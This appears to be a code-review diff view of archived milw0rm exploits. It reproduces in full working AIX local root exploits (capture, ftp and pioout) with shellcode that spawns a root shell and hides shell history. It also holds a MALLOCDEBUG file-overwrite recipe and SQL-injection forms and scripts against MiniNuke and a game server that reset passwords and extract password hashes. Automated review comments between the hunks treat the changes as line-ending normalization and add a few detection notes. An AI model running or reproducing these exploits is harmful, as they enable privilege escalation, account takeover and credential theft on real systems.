n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
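Review bot: this hunk replaces all 178 lines of the AIX capture exploit with identical content, which is the signature of a CRLF/LF conversion; because every line is marked changed, any real edit to the shellcode bytes or the get_addr() arithmetic would be invisible here. Reviewing with whitespace ignored (git diff -w) should yield an empty hunk if that is the case; confirm before merging.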

View file

@ -1,29 +1,29 @@
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]
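Review bot: the old and new sides of this hunk are identical text, so the change is line-ending or trailing-whitespace normalization and needs no content review. Worth recording for anyone using the archive defensively: the script writes `piolib.c`, builds it, runs `/usr/lpd/pio/etc/pioout -R ./piolib`, and then `rm -f piolib.c piolib`, so nothing is left on disk afterwards; detection of this pattern has to rely on process and audit events (a setuid `pioout` loading a library from a relative path) rather than on file artifacts.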

View file

@ -1,157 +1,157 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]
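Review bot: `kill(child, SIGTERM)` at the end of `main` uses `SIGTERM` without `#include <signal.h>` in the include list at the top of the file, and `ulong` (used in `get_addr` and `main`) is not a standard C type; both compile only because the AIX system headers happen to supply them, so a one-line comment stating the AIX-only assumption would help anyone reading this archived file on another platform. The old and new sides of the hunk are otherwise identical text, so the change itself is line-ending normalization.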

View file

@ -20,6 +20,6 @@ export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
# milw0rm.com [2005-03-25]
exec /tmp/ksh
# milw0rm.com [2005-03-25]
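Review bot: the only lines re-emitted on the new side are `exec /tmp/ksh` and the milw0rm trailer, so this is a line-ending change with no content to review. The unchanged context above it, `PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"` followed by `export PATH`, is worth a glance on its own: a relative `./` entry in `PATH` is exactly the configuration a least-privilege review of setuid tooling should flag.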

View file

@ -1,33 +1,33 @@
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]
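Review bot: the file opens with `#!/bin/bash`, but `Set the following environment variables:` is prose rather than a command, and the `umask 000` / `MALLOCTYPE=debug` / `MALLOCDEBUG=...` lines are meant to be typed into a shell by the reader, so executing the file as a script fails at the first prose line; this is advisory text and should be stored as such (or the instructions commented out) rather than carrying a shebang. The reference `securitytracker.com/id?1022261` and the two affected archives, `/usr/ccs/lib/libc.a` and `/usr/ccs/lib/libp/libc.a`, are the only remediation pointers in the file. Old and new sides are identical text; the diff is whitespace normalization.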

View file

@ -35,6 +35,6 @@ unsigned int code[]={
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
*/
# milw0rm.com [2004-09-26]

View file

@ -71,6 +71,6 @@ print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###
# milw0rm.com [2005-05-26]
### EOF ###
# milw0rm.com [2005-05-26]

View file

@ -30,6 +30,6 @@ print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name=
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>";
}
?>
# milw0rm.com [2005-05-26]
?>
# milw0rm.com [2005-05-26]

View file

@ -33,6 +33,6 @@ size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
# milw0rm.com [2005-05-26]
-----------------End-------------------
# milw0rm.com [2005-05-26]

View file

@ -32,6 +32,6 @@ firstname : <input name="firstname" value="Crkchat" type="text" size="50">
<!--
-----------------------------------
Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27]
Now u can use forgot password to gain passwords! -->
# milw0rm.com [2005-05-27]

View file

@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n";
print "[+]OK , Now Login With : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";
# milw0rm.com [2005-06-27]
# milw0rm.com [2005-06-27]

View file

@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-06-27]
print "[-] Unable to retrieve hash of password\n" if(!$1);
# milw0rm.com [2005-06-27]
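Review bot: the check `print "[-] Unable to retrieve hash of password\n" if(!$1);` is unreliable, because Perl leaves `$1` holding the capture from the previous successful match when a later match fails; if the username regex a few lines earlier matched, this branch never fires and `$1` still contains the username. Test the match result directly, e.g. `if (my ($hash) = $page =~ /the varchar value '(.*?)' to a column/) { ... } else { ... }`. The string being matched, a varchar conversion error echoed in the HTTP response, is also the thing a defender should look for: verbose database errors reaching the client are the disclosure channel here.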

View file

@ -104,6 +104,6 @@ hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
</td>
</tr>
</table>
</form>
# milw0rm.com [2005-07-18]
</form>
# milw0rm.com [2005-07-18]

View file

@ -1,44 +1,44 @@
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples:
-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord
Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2
-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->
<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>
# milw0rm.com [2005-10-15]
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address
Some SQL Examples:
-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--
Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord
Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2
-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--
ITEMCODE is which u can get from itemproject.exe u can find it on google ;)
-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->
<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>
# milw0rm.com [2005-10-15]

View file

@ -1,59 +1,59 @@
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form>
</html>
[/code]
# milw0rm.com [2006-01-14]
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form>
</html>
[/code]
# milw0rm.com [2006-01-14]

View file

@ -1,53 +1,53 @@
#!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru
use IO::Socket;
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
